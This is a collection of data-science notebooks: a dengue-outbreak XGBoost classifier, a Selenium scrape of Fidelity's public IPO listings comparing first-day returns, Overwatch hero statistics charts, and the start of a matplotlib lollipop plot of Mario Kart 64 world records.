        'reanalysis_sat_precip_amt_mm': 'Total precipitation in mm 2',
        'reanalysis_specific_humidity_g_per_kg': 'Mean specific humidity',
        'station_avg_temp_c': 'Average temp in C',
        'station_max_temp_c': 'Maximum temp in C',
        'station_precip_mm': 'Station precipitation in mm',
    }, inplace=True)
    X = X.drop(columns='total_cases')
    X = X.drop(columns='Total precipitation in mm 2')
    # return the wrangled dataframe
    return X
train = wrangle(train)
val = wrangle(val)
train.head().T
#Define target and features
# The dengue_outbreak column is the target
target = 'dengue_outbreak'
# Get a dataframe with all train columns except the target
train_features = train.drop(columns=[target])
# Get a list of the numeric features
numeric_features = train_features.select_dtypes(include='number').columns.tolist()
# Get a series with the cardinality of the nonnumeric features
cardinality = train_features.select_dtypes(exclude='number').nunique()
# Get a list of all categorical features with cardinality <= 50
categorical_features = cardinality[cardinality <= 50].index.tolist()
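# Keeping only low-cardinality categoricals prevents the one-hot encoding step
# further below from exploding the feature count.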
# Combine the lists
features = numeric_features + categorical_features
# Arrange data into X features matrix and y target vector
X_train = train[features]
y_train = train[target]
X_val = val[features]
y_val = val[target]
!pip install category_encoders
from sklearn.pipeline import make_pipeline
import category_encoders as ce
from sklearn.impute import SimpleImputer
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import OneHotEncoder
import xgboost as xgb
from xgboost import XGBClassifier
from sklearn import model_selection, preprocessing
processor = make_pipeline(
ce.OneHotEncoder(use_cat_names=True),
SimpleImputer(strategy='median')
)
X_train_processed = processor.fit_transform(X_train)
X_val_processed = processor.transform(X_val)
model = XGBClassifier(n_estimators=200, eval_metric='auc', n_jobs=-1)
eval_set = [(X_train_processed, y_train),
(X_val_processed, y_val)]
model.fit(X_train_processed, y_train, eval_set=eval_set, eval_metric='auc',
early_stopping_rounds=10)
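# Note: with early stopping, training may halt well before the 200 configured rounds;
# depending on the xgboost version, the best round is exposed as model.best_iteration
# (older versions: model.best_ntree_limit).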
results = model.evals_result()
train_auc = results['validation_0']['auc']
val_auc = results['validation_1']['auc']
iterations = range(1, len(train_auc) + 1)
plt.figure(figsize=(10,7))
plt.plot(iterations, train_auc, label='Train')
plt.plot(iterations, val_auc, label='Validation')
plt.title('XGBoost Validation Curve')
plt.ylabel('AUC')
plt.xlabel('Boosting Iterations (n_estimators)')
plt.legend();
#Validation accuracy
model.score(X_val_processed, y_val)
#predict on X_val
y_pred = model.predict(X_val_processed)
# Predicted probabilities for positive class
y_pred_proba = model.predict_proba(X_val_processed)[:, 1] # Probability for positive class
from sklearn.metrics import roc_auc_score
roc_auc_score(y_val, y_pred_proba)
#ROC-AUC score for the positive class (i.e., dengue outbreak) = 74.3%
# Compute the confusion_matrix
from sklearn.metrics import confusion_matrix
confusion_matrix(y_val, y_pred)
!pip install scikit-plot
import scikitplot as skplt
skplt.metrics.plot_confusion_matrix(y_val, y_pred,
figsize=(8,6),
title=f'Confusion Matrix (n={len(y_val)})',
normalize=False);
# Predicted probabilities for positive class
y_pred_proba2 = model.predict_proba(X_val_processed)[:, 1] # Probability for positive class
from sklearn.metrics import roc_curve
fpr, tpr, thresholds = roc_curve(y_val, y_pred_proba2)
# See the results in a table
pd.DataFrame({
'False Positive Rate': fpr,
'True Positive Rate': tpr,
'Threshold': thresholds
})
# See the results on a plot.
# This is the "Receiver Operating Characteristic" curve
plt.scatter(fpr, tpr)
plt.title('ROC curve')
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate');
# Use scikit-learn to calculate the area under the curve.
from sklearn.metrics import roc_auc_score
roc_auc_score(y_val, y_pred_proba2)
#Eli5 Permutation Importance Plot showing weights
!pip install eli5
import eli5
from eli5.sklearn import PermutationImportance
#Eli5 needs ordinal encoding
pipeline = make_pipeline(
ce.OrdinalEncoder(),
SimpleImputer(strategy='median')
)
X_train_transformed = pipeline.fit_transform(X_train)
X_val_transformed = pipeline.transform(X_val)
model = XGBClassifier(n_estimators=5, eval_metric='auc', n_jobs=-1)
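# Note: this re-binds the name 'model' to a much weaker 5-tree classifier, so the
# permutation importances below are computed for this small model, not for the
# 200-tree model trained earlier.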
model.fit(X_train_transformed, y_train)
permuter = PermutationImportance(
model,
scoring= 'accuracy',
n_iter=5,
random_state=42
)
permuter.fit(X_val_transformed, y_val)
permuter.feature_importances_
eli5.show_weights(
permuter,
top=None,
feature_names=X_val.columns.tolist()
)
###Output
_____no_output_____ |
Fidelity Research/Fidelity-IPO.ipynb | ###Markdown
First Day Returns of IPOs offered on Fidelity. Installs used packages
###Code
!pip install selenium
!pip install pandas
!pip install numpy
###Output
zsh:1: command not found: pip
zsh:1: command not found: pip
zsh:1: command not found: pip
###Markdown
Imports used packages
###Code
import time
import json
import pandas as pd
import numpy as np
###Output
_____no_output_____
###Markdown
Removes DataFrame size limits
###Code
pd.set_option('display.max_rows', None)
pd.set_option('display.max_columns', None)
pd.set_option('display.width', None)
pd.set_option('display.max_colwidth', None)
###Output
_____no_output_____
###Markdown
Credit Suisse IPOs Webscrapes Fidelity.com
###Code
from selenium import webdriver
PATH = '/home/jp/Python/chromedriver'
driver = webdriver.Chrome(PATH)
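# Environment note: Selenium 4 deprecates webdriver.Chrome(PATH) and the
# find_element_by_* helpers used below; on Selenium 4+ use
# webdriver.Chrome(service=Service(PATH)) and driver.find_element(By.XPATH, ...).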
url = 'https://www.fidelity.com/stock-trading/previous-year-ipos'
driver.get(url)
driver.maximize_window()
ipos = []
for year in range(1996,2021):
table = driver.find_element_by_xpath("//*[@id='{}']/table".format(year))
for row in table.find_elements_by_xpath(".//tr"):
ipo = [td.text for td in row.find_elements_by_xpath(".//td")]
if year < 2016:
if (ipo != []) and (ipo[5] == 'IPO' ) and ('Credit Suisse' in ipo[6]):
ipos.append(ipo)
elif year > 2015:
if (ipo != []) and (ipo[4] == 'IPO' ) and ('Credit Suisse' in ipo[5]):
ipos.append(ipo)
with open('fidelity-credit_suisse-IPOs.json', 'w+') as f:
json.dump(ipos, f)
driver.close()
###Output
_____no_output_____
###Markdown
Creates DataFrame of Fidelity IPOs
###Code
with open('fidelity-credit_suisse-IPOs.json', 'rb') as f:
data = json.load(f)
ipos = {
'Date':[],
'Issuer':[],
'Symbol':[],
'Managers':[],
'Access Bookmaker':[],
'Offer Price':[]
}
for ipo in data:
ipos['Issuer'].append(ipo[0])
ipos['Date'].append(ipo[1])
ipos['Offer Price'].append(float(ipo[2][1:]))
ipos['Symbol'].append(ipo[3].strip())
if int(ipo[1][-2:]) > 15:
ipos['Managers'].append(ipo[5])
ipos['Access Bookmaker'].append(ipo[6])
else:
ipos['Managers'].append(ipo[6])
ipos['Access Bookmaker'].append("Nan")
fid = pd.DataFrame(ipos)
fid
###Output
_____no_output_____
###Markdown
Create DataFrame from IPO Scoop XLS
###Code
file = 'ipos_excel.csv'
scoop = pd.read_csv(file)
scoop['1st Day % Chg'] = ((scoop['1st Day Close'] - scoop['Offer Price']) / scoop['Offer Price'])
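# The division above produces +/-inf whenever 'Offer Price' is 0, hence the
# inf -> NaN replacement and dropna below.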
scoop.replace([np.inf, -np.inf], np.nan, inplace=True)
scoop.dropna(inplace=True)
###Output
_____no_output_____
###Markdown
IPOs that are on Fidelity site but not IPO Scoop
###Code
fid[fid['Symbol'].isin(scoop['Symbol'])==False]
###Output
_____no_output_____
###Markdown
Fidelity IPOs with Open and Close Data from Scoop. Note: are there duplicates?
###Code
fid_ipos = scoop[scoop['Symbol'].isin(fid['Symbol'])==True]
fid_ipos = fid_ipos[fid_ipos['Managers'].str.contains('Credit Suisse')==True]
fid_ipos
###Output
_____no_output_____
###Markdown
Credit Suisse IPOs that are on IPO Scoop but not on Fidelity. Note: some rows in the IPO Scoop excel do not list Credit Suisse as manager even though the IPO is on the Fidelity site.
###Code
scoop_only = scoop[scoop['Symbol'].isin(fid['Symbol'])==False]
scoop_only = scoop_only[scoop_only['Managers'].str.contains('Credit Suisse')==True]
scoop_only = scoop_only[scoop_only['Symbol'].str.contains('.U')==False]
scoop_only = scoop_only[scoop_only['Issuer'].str.contains('Acquisition')==False]
scoop_only
scoop_only.to_csv('Credit_Suisee_IPOs_not_on_Fidelity.csv')
fid_ipos.to_csv('Credit_Suisse_IPOs_on_Fidelity.csv')
###Output
_____no_output_____
###Markdown
Mean of 1st Day Close % Chg of IPOs
###Code
non_fid_return = round(np.asarray(scoop_only['1st Day % Chg'], dtype=float).mean()*100,3)
fid_return = round(np.asarray(fid_ipos['1st Day % Chg'], dtype=float).mean()*100,3)
non_fid_return, fid_return
###Output
_____no_output_____
###Markdown
ALL IPOs (Not just Credit Suisse) Webscrapes Fidelity for all IPOs
###Code
from selenium import webdriver
PATH = '/home/jp/Python/chromedriver'
driver = webdriver.Chrome(PATH)
url = 'https://www.fidelity.com/stock-trading/previous-year-ipos'
driver.get(url)
driver.maximize_window()
ipos = []
for year in range(1996,2021):
table = driver.find_element_by_xpath("//*[@id='{}']/table".format(year))
for row in table.find_elements_by_xpath(".//tr"):
ipo = [td.text for td in row.find_elements_by_xpath(".//td")]
if year < 2016:
if (ipo != []) and (ipo[5] == 'IPO' ):
ipos.append(ipo)
elif year > 2015:
if (ipo != []) and (ipo[4] == 'IPO' ):
ipos.append(ipo)
with open('fidelity-IPOs.json', 'w+') as f:
json.dump(ipos, f)
driver.close()
###Output
_____no_output_____
###Markdown
Creates DataFrame
###Code
with open('fidelity-IPOs.json', 'rb') as f:
data = json.load(f)
ipos = {
'Date':[],
'Issuer':[],
'Symbol':[],
'Managers':[],
'Offer Price':[]
}
for ipo in data:
ipos['Issuer'].append(ipo[0])
ipos['Date'].append(ipo[1])
ipos['Offer Price'].append(float(ipo[2][1:]))
ipos['Symbol'].append(ipo[3].strip())
if int(ipo[1][-2:]) > 15:
ipos['Managers'].append(ipo[5])
else:
ipos['Managers'].append(ipo[6])
fid_all = pd.DataFrame(ipos)
###Output
_____no_output_____
###Markdown
Creates DataFrame of Fidelity IPOs
###Code
all_fid_ipos = scoop[scoop['Symbol'].isin(fid_all['Symbol'])==True]
all_fid_ipos.head()
###Output
_____no_output_____
###Markdown
Creates DataFrame of IPOs not on Fidelity
###Code
scoop_only_all = scoop[scoop['Symbol'].isin(fid_all['Symbol'])==False]
scoop_only_all = scoop_only_all[scoop_only_all['Symbol'].str.contains('.U')==False]
scoop_only_all = scoop_only_all[scoop_only_all['Issuer'].str.contains('Acquisition')==False]
scoop_only_all
###Output
_____no_output_____
###Markdown
Mean of 1st Day Close % Chg of IPOs
###Code
non_fid_return_all = round(np.asarray(scoop_only_all['1st Day % Chg'], dtype=float).mean()*100,3)
fid_return_all = round(np.asarray(all_fid_ipos['1st Day % Chg'], dtype=float).mean()*100,3)
non_fid_return_all, fid_return_all
###Output
_____no_output_____ |
Part 2_DATA VISUALIZATION (GAMING STATS).ipynb | ###Markdown
Python group project - ipynb n°2 - Visualization of data 1. Visualisation of win rates of each class of Hero, for levels : bronze gold and grandmaster The objective here is to find out graphically if the level influences the victory rate (which is a victory rate of the team) and if it is the same for all hero classes. We limit ourselves to Bronze (level 1), Gold (level 3) and GrandMaster (level 6).
###Code
# 0. import libraries #
import pandas
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
import matplotlib.patches as mpatches
plt.rcParams["figure.figsize"] = (5,8)
# 1. Read in a CSV file #
dataset = pandas.read_csv("overbuff.csv", encoding = "latin1")
# 2. keep only role, rank, and win_rate #
df0 = dataset[['Role','Rank', 'Win_rate']]
# 3. mean the win_rate for Role & Rank #
df1 = df0.groupby(['Role', 'Rank']).mean()
# 4. Create index for Levels and Roles #
df2 = df1.index.get_level_values(1)
Index_Levels = df2[0:5]
df3 = df1.index.get_level_values(0)
Index_Role = df3[::8]
print(Index_Role)
# 5. Gather Win_Rates by Role for Bronze, Gold & GrandMaster levels #
Bronze_Win_Rates = df1[1::8]
Gold_Win_Rates = df1[3::8]
Grandmaster_Win_Rates = df1[4::8]
Bin = [1,2,3,4]
# 6. set width of bar #
barWidth = 0.25
# 7. set height of bar #
bars1 = Bronze_Win_Rates[Bronze_Win_Rates.columns[0]].tolist()
bars2 = Gold_Win_Rates[Gold_Win_Rates.columns[0]].tolist()
bars3 = Grandmaster_Win_Rates[Grandmaster_Win_Rates.columns[0]].tolist()
# 8. Set position of bar on X axis #
r1 = np.arange(len(bars1))
r2 = [x + barWidth for x in r1]
r3 = [x + barWidth for x in r2]
# 9. Make the plot #
plt.bar(r1, bars1, color='#e67e22', width=barWidth, edgecolor='white', label='Bronze')
plt.bar(r2, bars2, color='#f1c40f', width=barWidth, edgecolor='white', label='Gold')
plt.bar(r3, bars3, color='#c0392b', width=barWidth, edgecolor='white', label='GrandMaster')
plt.ylim(40,61)
# 10. Add xticks on the middle of the group bars #
plt.xlabel('Role', fontweight='bold')
plt.ylabel('Win Rates', fontweight='bold')
plt.xticks([r + barWidth for r in range(len(bars1))], Index_Role)
# 11. Create legend & Show graphic #
plt.legend()
plt.show()
###Output
Index(['DEFENSE', 'OFFENSE', 'SUPPORT', 'TANK'], dtype='object', name='Role')
###Markdown
To conclude n°1: we can see quite easily on the graph that the win rates of bronze-level players are unequal depending on the class chosen. On the other hand, this gap tends to narrow as the level increases, until it becomes almost identical for all hero classes at the GrandMaster level. This analysis allows us to advise beginner players to focus on the "support" class in order to significantly increase their chances of winning a game. 2. Scatter plots of the pick rate of each hero & the win rate The idea here is to represent in one graph both the pick rate (if players pick hero "x" once in every 100 picks, the pick rate is 1%) for each hero and its win rate. The whole is divided into classes (bubble colors). This graph is made for the Bronze level as well as for the GrandMaster level. We are looking to visualize graphically whether players choose their heroes according to the win rate they offer, or whether it is the class type that influences players' choices.
###Code
# 1. Import lib & dataset - see point n°1 #
# 2. Select Only Bronze #
is_Bronze = dataset['Rank']=='Bronze'
df_Bronze = dataset[is_Bronze]
# 3. select Only PSN #
is_PSN = df_Bronze['Platform']=='PSN'
df_Bronze_PSN = df_Bronze[is_PSN]
# 4. Calculate Mean of rates for Bronze on PSN #
df_Bronze_PSN.mean(axis = 0)
# 5. Keep only columns : Hero, Pick_Rate, Win_Rate, Role #
df_Bronze_PSN_Clean = df_Bronze_PSN.drop(["Tie_Rate", "On_fire", "Platform", "Rank", "Date"], axis=1)
# 6. Convert df to values then lists #
PR = df_Bronze_PSN_Clean[['Pick_rate']].values.tolist() # x
WR = df_Bronze_PSN_Clean[['Win_rate']].values.tolist() # y
WR2 = WR
ROLE = df_Bronze_PSN_Clean[['Role']].values.tolist() # z
Color_role = df_Bronze_PSN_Clean[['Role']]
###Output
_____no_output_____
###Markdown
I want the win rate to be visually noticeable through the bubble size as well. To do that I need to enhance the difference between the minimum win rate and the maximum one, while keeping it proportional.
###Code
# 7. Create value for bubbles size #
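# Affine rescale: shifting by -30 and multiplying by 70 exaggerates the spread of
# win rates so differences stay visible as bubble sizes, while remaining proportional.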
WR3 = df_Bronze_PSN_Clean[['Win_rate']].values
WR4 = WR3-30
WR5 = WR4*70
WRZ = WR5.tolist()
# 8. Plot the Data #
x = PR
y = WR
z = [WRZ]
colors = {'TANK':'black', 'SUPPORT':'green', 'DEFENSE':'blue', 'OFFENSE':'red'} # Map each role to a fixed color, matching the legend patches below.
plt.scatter(x, y,s=z, c=Color_role['Role'].apply(lambda x: colors[x]), edgecolors="white",alpha=0.6, linewidth=2)
plt.xlabel("Pick Rate in %") # Add titles (main and on axis)
plt.ylabel("Win Rate in %")
plt.title("Distribution of the 23 Heros according to the pick rate and the win rate \n For bronze level")
black_patch = mpatches.Patch(color='black' , label='TANK')
green_patch = mpatches.Patch(color='green', label='SUPPORT')
blue_patch = mpatches.Patch(color='blue' , label='DEFENSE')
red_patch = mpatches.Patch(color='red' , label='OFFENSE')
plt.legend(handles=[red_patch,black_patch,green_patch, blue_patch])
plt.show()
###Output
_____no_output_____
###Markdown
Let's do the same plot for the level of GrandMaster
###Code
# 8. Select the needed data #
is_Grandmaster = dataset['Rank']=='Grandmaster' #We focus only on the rank Grand Master
df_Grandmaster = dataset[is_Grandmaster]
df_Grandmaster
is_PSNGM = df_Grandmaster['Platform']=='PSN' #We focus only on the platform PSN
df_Grandmaster_PSN = df_Grandmaster[is_PSNGM]
df_Grandmaster_PSN
# 9. Calculate Mean of rates for Bronze on PSN #
df_Grandmaster_PSN.mean(axis = 0)
df_Grandmaster_PSN_Clean = df_Grandmaster_PSN.drop(["Tie_Rate", "On_fire", "Platform", "Rank", "Date"], axis=1)#Keep only columns : Hero, Pick_Rate, Win_Rate, Role
# 10. Convert df to values then lists #
PRGM = df_Grandmaster_PSN_Clean[['Pick_rate']].values.tolist() # x
WRGM = df_Grandmaster_PSN_Clean[['Win_rate']].values.tolist() # y
WR2GM = WR
ROLEGM = df_Grandmaster_PSN_Clean[['Role']].values.tolist() # z
ROLE = {'TANK', 'SUPPORT', 'DEFENSE', 'OFFENSE'}
Color_roleGM = df_Grandmaster_PSN_Clean[['Role']]
###Output
_____no_output_____
###Markdown
I want the win rate to be visually noticeable through the bubble size as well. To do that I need to enhance the difference between the minimum win rate and the maximum one, while keeping it proportional.
###Code
# 11. Create value for bubbles sizeand Define the variables#
WR3GM = df_Grandmaster_PSN_Clean[['Win_rate']].values
WR4GM = WR3GM-30
WR5GM = WR4GM*70
WRZGM = WR5GM.tolist()
xgm = PRGM
ygm = WRGM
zgm = [WRZGM]
# 12. Plot the data #
colors = {'TANK':'black', 'SUPPORT':'green', 'DEFENSE':'blue', 'OFFENSE':'red'} # Map each role to a fixed color, matching the legend patches below.
plt.scatter(xgm, ygm, s=zgm, c=Color_roleGM['Role'].apply(lambda x: colors[x]), edgecolors="white", alpha=0.5, linewidth=1)
plt.xlabel("Pick Rate in %") #Add titles on axis
plt.ylabel("Win Rate in %")
plt.title("Distribution of the 23 Heros according to the pick rate and the win rate \n For GrandMaster level") #Add the general title
black_patch = mpatches.Patch(color='black' , label='TANK')
green_patch = mpatches.Patch(color='green', label='SUPPORT')
blue_patch = mpatches.Patch(color='blue' , label='DEFENSE')
red_patch = mpatches.Patch(color='red' , label='OFFENSE')
plt.legend(handles=[red_patch,black_patch,green_patch, blue_patch])
plt.show()
###Output
_____no_output_____
###Markdown
To conclude the n°2 We can see at first sight that heros pick rate and win rate is much more dispersed than for the grandmaster level. On the other hand, it is not obvious here that the characters' choices are influenced by the victory rate. It is also not easy to show the heroes' choices according to class, neither for the bronze level nor for the grandmaster level. Evolution of the "on fire rate" level after level In our dataset, being on fire is a state triggered in the game after a number of remarkable actions (e. g. a sequence of several kills). The rate of "on_fire" corresponds to the number of times players have been able to trigger this state in relation to the number of games.Here we study the evolution of the triggering of this state "in fire" over the evolution of levels for each character in the "tank" and "support" class. We therefore try to see graphically if the evolutions are rhythmic in the same way for each character and for each class studied.
###Code
# 1. Import lib & dataset - see point n°1 #
# 2. Create list of unique values for Role & Platform #
Role_list = list(set(dataset["Role"]))
Order_rank = ["Bronze","Silver" , "Gold", "Platinum","Diamond","Master","Grandmaster" ]
# 3. Keep only Hero, Rank and the On-fire rate #
df1 = dataset.drop(["Tie_Rate", "Pick_rate", "Role", "Win_rate", "Date"], axis=1)
df2 = df1.pivot_table(index=["Hero"], columns="Rank")
# 4. OrderClass and round vlaues #
df3 = df2.reindex(Order_rank, axis=1, level=1)
# 5. Create Axis #
x = [1,2,3,4,5,6,7]
df_temp_Tank = dataset[dataset["Role"]=="TANK"] #Get the list of tank
df_temp2_Tank = df_temp_Tank.pivot_table(index=["Hero"], columns="Win_rate")
df_temp3_Tank = list(df_temp2_Tank.index)
df_temp3_Tank
# 6. Plot data for each tank #
df7 = df3.loc[df3.index.isin(df_temp3_Tank)].values
xx = (1,2,3,4,5,6,7)
for i in df7 : plt.plot(xx, i, alpha=0.8)
list7=[] #Add value at end of each line
for gg in df7 : list7.append((gg[6:7]))
for valuess in list7 : plt.text(7+0.5, valuess, np.around(valuess,1))
list8=[] #Add value at beginning of each line
for ggg in df7 : list8.append((ggg[0:1]))
for valuess in list8 : plt.text(0.17, valuess, np.around(valuess,1), )
plt.xlabel("Rank")
plt.ylabel("On Fire Rate")
plt.title("Heros that are Tank")
plt.xticks([1,2,3,4,5,6,7], Order_rank, fontsize='8')
plt.legend(df3.loc[df3.index.isin(df_temp3_Tank)].index)
plt.show()
# 7. Plot the data for each support #
x = [1,2,3,4,5,6,7]
df_temp_SUPPORT = dataset[dataset["Role"]=="SUPPORT"]
df_temp2_SUPPORT = df_temp_SUPPORT.pivot_table(index=["Hero"], columns="Win_rate")
df_temp3_SUPPORT = list(df_temp2_SUPPORT.index)
df7_SUPPORT = df3.loc[df3.index.isin(df_temp3_SUPPORT)].values
xx = (1,2,3,4,5,6,7)
for i in df7_SUPPORT : plt.plot(xx, i, alpha=0.8)
list7_SUPPORT=[]
for gg in df7_SUPPORT : list7_SUPPORT.append((gg[6:7]))
for valuess in list7_SUPPORT : plt.text(7+0.5, valuess, np.around(valuess,1))
list8_SUPPORT=[]
for ggg in df7_SUPPORT : list8_SUPPORT.append((ggg[0:1]))
for valuess in list8_SUPPORT : plt.text(0.17, valuess, np.around(valuess,1), )
plt.xlabel("Rank")
plt.ylabel("On Fire Rate")
plt.title("Heros that are Support")
plt.legend(df3.loc[df3.index.isin(df_temp3_SUPPORT)].index)
plt.xticks([1,2,3,4,5,6,7], Order_rank, fontsize='8')
plt.show()
###Output
_____no_output_____ |
src/notebooks/web-lollipop-plot-with-python-mario-kart-64-world-records.ipynb | ###Markdown
AboutThis page showcases the work of [Cedric Scherer](https://www.cedricscherer.com), built for the [TidyTuesday](https://github.com/rfordatascience/tidytuesday) initiative. You can find the original code on his github repository [here](https://github.com/z3tt/TidyTuesday/blob/master/R/2021_22_MarioKart.Rmd), written in [R](https://www.r-graph-gallery.com).Thanks to him for accepting sharing his work here! Thanks also to [Tomás Capretto](https://tcapretto.netlify.app) who translated this work from R to Python! 🙏🙏 Load libraries As always, several libraries are needed in order to build the chart. `numpy`, `pandas` and `matplotlib` are pretty usual, but we also need some lesser known libraries like `palettable` to get some nice colors.
###Code
import numpy as np
import pandas as pd
import matplotlib.colors as mc
import matplotlib.pyplot as plt
from matplotlib.cm import ScalarMappable
from matplotlib.lines import Line2D
from mpl_toolkits.axes_grid1.inset_locator import inset_axes
from palettable import cartocolors
###Output
_____no_output_____
###Markdown
Load the dataset Today we are going to visualize world records for the Mario Kart 64 game. The game consists of 16 individual tracks and world records can be achieved for the fastest *single lap* or the fastest completed race (**three laps**). Also, through the years, players discovered **shortcuts** in many of the tracks. Fortunately, shortcut and non-shortcut world records are listed separately.Our chart consists of a double-dumbbell plot where we visualize world record times on Mario Kart 64 with and without shortcuts. The original source of the data is [https://mkwrs.com/](https://mkwrs.com/), which holds time trial world records for all of the Mario Kart games, but we are using the version released for the [TidyTuesday](https://github.com/rfordatascience/tidytuesday) initiative on the week of 2021-05-25. You can find the original announcement and more information about the data [here](https://github.com/rfordatascience/tidytuesday/tree/master/data/2021/2021-05-25).
###Code
df_records = pd.read_csv('https://raw.githubusercontent.com/rfordatascience/tidytuesday/master/data/2021/2021-05-25/records.csv')
df_records.head(3)
###Output
_____no_output_____
###Markdown
From all the columns in the data, we will only use `track`, `type`, `shortcut`, `date`, and `time`.
- `track` indicates the name of the track
- `type` tells us whether the record is for a single lap or a complete race
- `shortcut` is a yes/no variable that identifies records where a shortcut was used
- `date` represents the date when the record was achieved
- `time` indicates how many seconds it took to complete the track
###Code
# Keep records where type is Three Lap
df_rank = df_records.query("type == 'Three Lap'")
# Keep records with the minimum time for each track
df_rank = df_rank.loc[df_rank.groupby("track")["time"].idxmin()]
# Sort by descending time
df_rank = df_rank.sort_values("time", ascending=False)
# Make "track" ordered categorical with order given by descending times
# This categorical type will be used to sort the tracks in the plot.
df_rank["track"] = pd.Categorical(df_rank["track"], ordered=True, categories=df_rank["track"])
###Output
_____no_output_____
###Markdown
Then we have `df_records_three`, which holds all the records, whether or not they were later beaten. It is used to derive the other data frames used in our chart.
###Code
# We call '.reset_index()' to avoid SettingWithCopyWarning
df_records_three = df_records.query("type == 'Three Lap'").reset_index()
df_records_three["year"] = pd.DatetimeIndex(df_records_three["date"]).year
###Output
_____no_output_____
###Markdown
`df_connect` is the first data frame we derive. This one is used to add a dotted line that connects record times with and without shortcuts and will serve as a reference for their difference.
###Code
# First of all, for each track and shortcut, obtain the minimum and maximum
# value of time. These represent the most recent and first records, respectively.
df_connect = df_records_three.groupby(["track", "shortcut"]).agg(
no = ("time", min),
yes = ("time", max)
).reset_index()
# Next, put it into long format.
# Each row indicates the track, whether shortcuts were used,
# if it's the current record, and the time achieved.
df_connect = pd.melt(
df_connect,
id_vars=["track", "shortcut"],
value_vars=["no", "yes"],
var_name="record",
value_name="time"
)
# The dotted line goes from the first record without shortcut (the slowest)
# to the most recent record with shortcut (the fastest)
df_connect = df_connect.query(
"(shortcut == 'No' and record == 'no') or (shortcut == 'Yes' and record == 'yes')"
)
# Finally it is put in wide format, where there's only one row per track.
df_connect = df_connect.pivot_table(index="track", columns="record", values="time").reset_index()
###Output
_____no_output_____
###Markdown
We also have `df_longdist` and `df_shortcut`. Note each data frame consists of five columns: `track`, `year`, `max`, `min`, and `diff`. `year` refers to the year where the current record was achieved, `max` is the completetion time for the first record and `min` is the time for the current record. `diff` is simply the difference between `max` and `min`, i.e. a measurement of how much the first record was improved. `df_shortcut` and `df_longdist` refer to records with and without shortcuts, respectively.
###Code
# Long dist refers to records without shortcut
df_longdist = df_records_three.query("shortcut == 'No'")
# Only keep observations referring to either the first or the most recent record, by track.
grouped = df_longdist.groupby("track")
df_longdist = df_longdist.loc[pd.concat([grouped["time"].idxmax(), grouped["time"].idxmin()])]
# Create a 'group' variable that indicates whether the record
# refers to the first record, the one with maximum time,
# or to the most recent record, the one with minimum time.
df_longdist.loc[grouped["time"].idxmax(), "group"] = "max"
df_longdist.loc[grouped["time"].idxmin(), "group"] = "min"
# 'year' records the year of the most recent record
df_longdist["year"] = df_longdist.groupby("track")['year'].transform(max)
# Put the data in wide format, i.e., one observation per track.
df_longdist = df_longdist.pivot_table(index=["track", "year"], columns="group", values="time").reset_index()
df_longdist["diff"] = df_longdist["max"] - df_longdist["min"]
# Same process than above, but using records where shortcut is "Yes"
df_shortcut = df_records_three.query("shortcut == 'Yes'")
grouped = df_shortcut.groupby("track")
df_shortcut = df_shortcut.loc[pd.concat([grouped["time"].idxmax(), grouped["time"].idxmin()])]
df_shortcut.loc[grouped["time"].idxmax(), "group"] = "max"
df_shortcut.loc[grouped["time"].idxmin(), "group"] = "min"
df_shortcut["year"] = df_shortcut.groupby("track")['year'].transform(max)
df_shortcut = df_shortcut.pivot_table(index=["track", "year"], columns="group", values="time").reset_index()
df_shortcut["diff"] = df_shortcut["max"] - df_shortcut["min"]
###Output
_____no_output_____
###Markdown
All the datasets are sorted according to the order of `"track"` in `df_rank`. To do so, we first set the type of the `"track"` variable equal to the categorical type in `df_rank`, and then sort according to its levels.
###Code
tracks_sorted = df_rank["track"].dtype.categories.tolist()
# Sort df_connect
df_connect["track"] = df_connect["track"].astype("category")
df_connect["track"].cat.set_categories(tracks_sorted, inplace=True)
df_connect = df_connect.sort_values("track")
# Sort df_longdist
df_longdist["track"] = df_longdist["track"].astype("category")
df_longdist["track"].cat.set_categories(tracks_sorted, inplace=True)
df_longdist = df_longdist.sort_values("track")
# Sort df_shortcut
df_shortcut["track"] = df_shortcut["track"].astype("category")
df_shortcut["track"].cat.set_categories(tracks_sorted, inplace=True)
df_shortcut = df_shortcut.sort_values("track")
###Output
_____no_output_____
###Markdown
Start building the chart This highly customized plot demands a lot of code. It is a good practice to define the colors at the very beginning so we can refer to them by name.
###Code
GREY94 = "#f0f0f0"
GREY75 = "#bfbfbf"
GREY65 = "#a6a6a6"
GREY55 = "#8c8c8c"
GREY50 = "#7f7f7f"
GREY40 = "#666666"
LIGHT_BLUE = "#b4d1d2"
DARK_BLUE = "#242c3c"
BLUE = "#4a5a7b"
WHITE = "#FFFCFC" # technically not pure white
###Output
_____no_output_____
###Markdown
Today we make use of the `palettable` library to make use of the `RedOr` palette, which is the one used in the original plot. We will also make use of the `matplotlib.colors.Normalize` class to normalize values into the (0, 1) interval before we pass it to our `colormap` function and `matplotlib.colors.LinearSegmentedColormap` to create a custom colormap for blue colors.
###Code
# We have two colormaps, one for orange and other for blue
colormap_orange = cartocolors.sequential.RedOr_5.mpl_colormap
# And we also create a new colormap using
colormap_blue = mc.LinearSegmentedColormap.from_list("blue", [LIGHT_BLUE, DARK_BLUE], N=256)
###Output
_____no_output_____
###Markdown
`colormap_orange` and `colormap_blue` are now functions.
###Code
fig, ax = plt.subplots(figsize = (15, 10))
# Add segments ---------------------------------------------------
# Dotted line connection shortcut yes/no
ax.hlines(y="track", xmin="yes", xmax="no", color=GREY75, ls=":", data=df_connect)
# Segment when shortcut==yes
# First time we use the colormap and the normalization
norm_diff = mc.Normalize(vmin=0, vmax=250)
color = colormap_orange(norm_diff(df_shortcut["diff"].values))
ax.hlines(y="track", xmin="min", xmax="max", color=color, lw=5, data=df_shortcut)
# Segment when shortcut==no. Note we are overlapping lineranges
# We use the same normalization scale.
color = colormap_orange(norm_diff(df_longdist["diff"].values))
ax.hlines(y="track", xmin="min", xmax="max", color=color, lw=4, data=df_longdist)
ax.hlines(y="track", xmin="min", xmax="max", color=WHITE, lw=2, data=df_longdist)
# Add dots -------------------------------------------------------
## Dots when shortcut==yes – first record
# zorder is added to ensure dots are on top
ax.scatter(x="max", y="track", s=200, color=GREY65, edgecolors=GREY65, lw=2.5, zorder=2, data=df_shortcut)
## Dots when shortcut==yes – latest record
# This time we normalize using the range of years in the data, and use blue colormap
norm_year = mc.Normalize(df_shortcut["year"].min(), df_shortcut["year"].max())
color = colormap_blue(norm_year(df_shortcut["year"].values))
